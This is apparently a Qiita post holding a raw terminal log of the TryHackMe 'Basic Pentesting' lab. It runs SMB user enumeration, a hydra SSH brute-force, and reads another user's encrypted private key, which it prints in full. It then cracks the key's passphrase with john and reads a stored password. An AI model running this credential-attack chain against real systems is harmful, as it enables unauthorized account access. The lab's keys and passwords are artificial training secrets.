0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

TryHackMe

Last updated at Posted at 2025-10-10

Basic Pentesting

S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)

 ============================================= 
|    Getting printer info for 10.10.115.56    |
 ============================================= 
No printers returned.


enum4linux complete on Fri Oct 10 17:52:25 2025

root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:01
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1
root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.115.56:22/
[STATUS] 163.00 tries/min, 163 tries in 00:01h, 14344239 to do in 1466:42h, 16 active
[STATUS] 113.33 tries/min, 340 tries in 00:03h, 14344062 to do in 2109:26h, 16 active
^[c^[c^[c^[c^[c^C^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.115.56' (ECDSA) to the list of known hosts.
jan@10.10.115.56's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri 10 Oct 2025 01:13:49 PM EDT

  System load:  0.0                Processes:             107
  Usage of /:   49.8% of 13.62GB   Users logged in:       0
  Memory usage: 48%                IPv4 address for eth0: 10.10.115.56
  Swap usage:   0%

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@ip-10-10-115-56:~$ 
jan@ip-10-10-115-56:~$ 
jan@ip-10-10-115-56:~$ 
jan@ip-10-10-115-56:~$ 
jan@ip-10-10-115-56:~$ 
jan@ip-10-10-115-56:~$ ls 
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ la
la: command not found
jan@ip-10-10-115-56:/home$ ls
jan  kay  ubuntu
jan@ip-10-10-115-56:/home$ sudo su kay
[sudo] password for jan: 
jan is not in the sudoers file.  This incident will be reported.
jan@ip-10-10-115-56:/home$ ls
jan  kay  ubuntu
jan@ip-10-10-115-56:/home$ cd kay
jan@ip-10-10-115-56:/home/kay$ ls -a
.	       .bash_logout  .lesshst  .profile			  .viminfo
..	       .bashrc	     .nano     .ssh
.bash_history  .cache	     pass.bak  .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cat .sudo_as_admin_successful 
jan@ip-10-10-115-56:/home/kay$ sudo cat .sudo_as_admin_successful 
[sudo] password for jan: 
jan is not in the sudoers file.  This incident will be reported.
jan@ip-10-10-115-56:/home/kay$ ssh kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
kay@10.10.115.56's password: 
Permission denied, please try again.
kay@10.10.115.56's password: 

jan@ip-10-10-115-56:/home/kay$ ls
pass.bak
jan@ip-10-10-115-56:/home/kay$ ls -a
.	       .bash_logout  .lesshst  .profile			  .viminfo
..	       .bashrc	     .nano     .ssh
.bash_history  .cache	     pass.bak  .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh
jan@ip-10-10-115-56:/home/kay/.ssh$ ll
ll: command not found
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i authorized_keys kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Load key "authorized_keys": invalid format
kay@10.10.115.56's password: 

jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i "authorized_keys" kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? 
Host key verification failed.
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# touch ssh_ket.pem
root@ip-10-10-91-159:~# ls
burp.json   Downloads      Pictures  Scripts      staff.txt
CTFBuilder  hydra.restore  Postman   snap         thinclient_drives
Desktop     Instructions   Rooms     ssh_ket.pem  Tools
root@ip-10-10-91-159:~# vi ssh_ket.pem 
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r--  1 root root     13154 May  6  2024 burp.json
drwxr-xr-x  2 root root      4096 May  6  2024 CTFBuilder
drwxr-xr-x  4 root root      4096 May 23 09:44 Desktop
drwxr-xr-x  2 root root      4096 Nov 19  2024 Downloads
-rw-r--r--  1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x  2 root root      4096 May  7  2024 Instructions
drwxr-xr-x  3 root root      4096 May 16 12:28 Pictures
drwxr-xr-x  3 root root      4096 Aug 16  2020 Postman
drwxr-xr-x 41 root root      4096 May 23 09:40 Rooms
drwxr-xr-x  2 root root      4096 Oct 10 09:10 Scripts
drwx------  5 root root      4096 May 16 12:34 snap
-rw-r--r--  1 root root       772 Oct 10 18:25 ssh_ket.pem
-rw-r--r--  1 root root       173 Oct 10 17:49 staff.txt
drwxr-xr-t  2 root root      4096 Aug 13  2020 thinclient_drives
lrwxrwxrwx  1 root root        19 Mar 18  2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# chmod 600 ssh_ket.pem 
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r--  1 root root     13154 May  6  2024 burp.json
drwxr-xr-x  2 root root      4096 May  6  2024 CTFBuilder
drwxr-xr-x  4 root root      4096 May 23 09:44 Desktop
drwxr-xr-x  2 root root      4096 Nov 19  2024 Downloads
-rw-r--r--  1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x  2 root root      4096 May  7  2024 Instructions
drwxr-xr-x  3 root root      4096 May 16 12:28 Pictures
drwxr-xr-x  3 root root      4096 Aug 16  2020 Postman
drwxr-xr-x 41 root root      4096 May 23 09:40 Rooms
drwxr-xr-x  2 root root      4096 Oct 10 09:10 Scripts
drwx------  5 root root      4096 May 16 12:34 snap
-rw-------  1 root root       772 Oct 10 18:25 ssh_ket.pem
-rw-r--r--  1 root root       173 Oct 10 17:49 staff.txt
drwxr-xr-t  2 root root      4096 Aug 13  2020 thinclient_drives
lrwxrwxrwx  1 root root        19 Mar 18  2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Load key "ssh_ket.pem": invalid format
kay@10.10.115.56's password: 

root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
jan@10.10.115.56's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri 10 Oct 2025 01:27:28 PM EDT

  System load:  0.0                Processes:             107
  Usage of /:   49.8% of 13.62GB   Users logged in:       0
  Memory usage: 47%                IPv4 address for eth0: 10.10.115.56
  Swap usage:   0%

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Fri Oct 10 13:13:51 2025 from 10.10.91.159
jan@ip-10-10-115-56:~$ ls -l
total 0
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ ll
ll: command not found
jan@ip-10-10-115-56:/home$ cd kay/
jan@ip-10-10-115-56:/home/kay$ ls -a
.	       .bash_logout  .lesshst  .profile			  .viminfo
..	       .bashrc	     .nano     .ssh
.bash_history  .cache	     pass.bak  .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh/
jan@ip-10-10-115-56:/home/kay/.ssh$ ls -l
total 12
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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
-----END RSA PRIVATE KEY-----
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# ls 
burp.json   Downloads      Pictures  Scripts      staff.txt
CTFBuilder  hydra.restore  Postman   snap         thinclient_drives
Desktop     Instructions   Rooms     ssh_ket.pem  Tools
root@ip-10-10-91-159:~# vi s
snap/        ssh_ket.pem  staff.txt    
root@ip-10-10-91-159:~# vi ssh_ket.pem 
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem': 
kay@10.10.115.56's password: 
Permission denied, please try again.
kay@10.10.115.56's password: 
Permission denied, please try again.
kay@10.10.115.56's password: 
Connection closed by 10.10.115.56 port 22
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# python ssh2john.py ssh_ket.pem > id_rsa_conv
root@ip-10-10-91-159:~# ls -l
total 150752
-rw-r--r--  1 root root     13154 May  6  2024 burp.json
drwxr-xr-x  2 root root      4096 May  6  2024 CTFBuilder
drwxr-xr-x  4 root root      4096 May 23 09:44 Desktop
drwxr-xr-x  2 root root      4096 Nov 19  2024 Downloads
-rw-r--r--  1 root root 154275923 Oct 10 18:01 hydra.restore
-rw-r--r--  1 root root      4767 Oct 10 18:34 id_rsa_conv
drwxr-xr-x  2 root root      4096 May  7  2024 Instructions
drwxr-xr-x  3 root root      4096 May 16 12:28 Pictures
drwxr-xr-x  3 root root      4096 Aug 16  2020 Postman
drwxr-xr-x 41 root root      4096 May 23 09:40 Rooms
drwxr-xr-x  2 root root      4096 Oct 10 09:10 Scripts
drwx------  5 root root      4096 May 16 12:34 snap
-rwxr-xr-x  1 root root      8696 Sep  2  2020 ssh2john.py
-rw-------  1 root root      3327 Oct 10 18:29 ssh_ket.pem
-rw-r--r--  1 root root       173 Oct 10 17:49 staff.txt
drwxr-xr-t  2 root root      4096 Aug 13  2020 thinclient_drives
lrwxrwxrwx  1 root root        19 Mar 18  2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# 
root@ip-10-10-91-159:~# john id_rsa_conv --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (ssh_ket.pem)
1g 0:00:00:08 DONE (2025-10-10 18:39) 0.1243g/s 1783Kp/s 1783Kc/s 1783KC/s *7¡Vamos!
Session completed. 
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem': 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri 10 Oct 2025 01:40:49 PM EDT

  System load:  0.0                Processes:             107
  Usage of /:   49.9% of 13.62GB   Users logged in:       0
  Memory usage: 47%                IPv4 address for eth0: 10.10.115.56
  Swap usage:   0%

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.

Last login: Sun Jun 22 13:40:04 2025 from 10.23.8.228
kay@ip-10-10-115-56:~$ cd ~
kay@ip-10-10-115-56:~$ ls -a
.   .bash_history  .bashrc  .lesshst  pass.bak  .ssh                       .viminfo
..  .bash_logout   .cache   .nano     .profile  .sudo_as_admin_successful
kay@ip-10-10-115-56:~$ cat pass.bak 
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@ip-10-10-115-56:~$ 
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?